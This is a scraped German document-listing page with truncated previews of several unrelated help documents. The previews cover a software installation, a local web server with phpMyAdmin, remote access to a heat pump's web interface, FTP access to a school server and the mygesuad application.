Um die Installation zu starten, klicken Sie auf den Downloadlink in Ihrer E-Mail (Zugangsdaten für Ihre Bestellung vom...)

Um die Installation zu starten, klicken Sie auf den Downloadlink in Ihrer E-Mail (Zugangsdaten für Ihre Bestellung vom...) Inhalt Vorbereitung der LIFT-Installation... 1 Download der Installationsdateien (Internet Explorer)... 2 Download der Installationsdateien (Firefox)... 4 Installationsdateien extrahieren... 6 Extrahieren

Mehr

Für die Bearbeitung von MySQL-Datenbanken ist das Administrationswerkzeug phpmyadmin integriert.

Für die Bearbeitung von MySQL-Datenbanken ist das Administrationswerkzeug phpmyadmin integriert. LocalWebServer V2 for NOF 7.5/8/9/10/11/12 mit MySQL- und SqLite-Datenbank sowie lokalem SMTP-Server Server Die Komponente LocalWebServer ist ein kompletter lokaler Web-Server mit PHP Erweiterung (PHP

Mehr

Aufruf der Weboberflache des HPM- Warmepumpenmanagers aus dem Internet TIPPS

Aufruf der Weboberflache des HPM- Warmepumpenmanagers aus dem Internet TIPPS Aufruf der Weboberflache des HPM- Warmepumpenmanagers aus dem Internet TIPPS Oktober 2015 Tipp der Woche vom 28. Oktober 2015 Aufruf der Weboberfläche des HPM-Wärmepumpenmanagers aus dem Internet Der Panasonic

Mehr

Sie finden im Folgenden drei Anleitungen, wie Sie sich mit dem Server der Schule verbinden können:

Sie finden im Folgenden drei Anleitungen, wie Sie sich mit dem Server der Schule verbinden können: FTP-Zugang zum Schulserver Sie finden im Folgenden drei Anleitungen, wie Sie sich mit dem Server der Schule verbinden können: Zugang mit dem Internet Explorer (zum download von Dateien) Zugang mit dem

Mehr

mygesuad Download: http://www.collector.ch/mygesuad Wamp/Lamp Systemumgebungen: http://www.apachefriends.org/en/xampp-windows.html

mygesuad Download: http://www.collector.ch/mygesuad Wamp/Lamp Systemumgebungen: http://www.apachefriends.org/en/xampp-windows.html ÅçööÉÅíçêKÅÜ ÄΩêÉêëÉãáçëóëöçÄÉêÉïÉáÇOMöÅÜJQNORêáÉÜÉåöáåÑç]ÅçääÉÅíçêKÅÜöMMQNSNSQNNVNO mygesuad Open Source Gesuchsverwaltung version 0.9, Stefan Bürer, Riehen, 2004-2005 mygesuad wurde von bürer semiosys

Mehr